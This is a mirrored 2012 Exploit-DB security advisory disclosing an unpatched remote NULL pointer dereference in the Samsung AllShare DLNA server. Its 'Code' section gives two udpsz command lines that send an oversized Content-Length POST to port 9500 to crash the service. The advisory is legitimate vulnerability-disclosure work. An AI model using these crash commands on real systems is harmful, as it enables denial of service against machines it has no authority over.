Samsung AllShare 2.1.1.0 – Null Pointer Dereference

  • 作者: Luigi Auriemma
    日期: 2012-06-19
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/19289/
  • #######################################################################
    
     Luigi Auriemma
    
    Application:Samsung AllShare
    http://www.samsung.com/global/allshare/pcsw/
    Versions: <= 2.1.1.0
    Platforms:Windows
    Bug:NULL pointer
    Exploitation: remote
    Date: 18 Jun 2012
    Author: Luigi Auriemma
    e-mail: aluigi@autistici.org
    web:aluigi.org
    
    
    #######################################################################
    
    
    1) Introduction
    2) Bug
    3) The Code
    4) Fix
    
    
    #######################################################################
    
    ===============
    1) Introduction
    ===============
    
    
    From vendor's homepage:
    "The AllShare software enables your PC to run many AllShare services.
    It can share videos, photos, and music between your PC and other
    devices that support the AllShare service by using your local network
    for streaming playback."
    
    
    #######################################################################
    
    ======
    2) Bug
    ======
    
    
    The DLNA server listening on port 9500 can be crashed remotely due to
    a NULL pointer dereference caused by the failed allocation of a big
    amount of memory specified in Content-Length and the tentative of
    copying data in this NULL buffer.
    
    If Content-Length is between 4294967262 and 4294967293 the effect will
    be an unhandled exception in MSVCR90.calloc.
    
    The vulnerability is located in the lupin3 (libpin3) library.
    
    
    #######################################################################
    
    ===========
    3) The Code
    ===========
    
    
    http://aluigi.org/testz/udpsz.zip
    https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15992.zip
    
    udpsz -c "POST /DocumentViewer/Control/blah HTTP/1.1\r\nCONTENT-LENGTH: 2147483647\r\n\r\n" -T SERVER 9500 -1
    or
    udpsz -c "POST /DocumentViewer/Control/blah HTTP/1.1\r\nCONTENT-LENGTH: 4294967293\r\n\r\n" -T SERVER 9500 -1
    
    
    
    #######################################################################
    
    ======
    4) Fix
    ======
    
    
    No fix.
    
    
    #######################################################################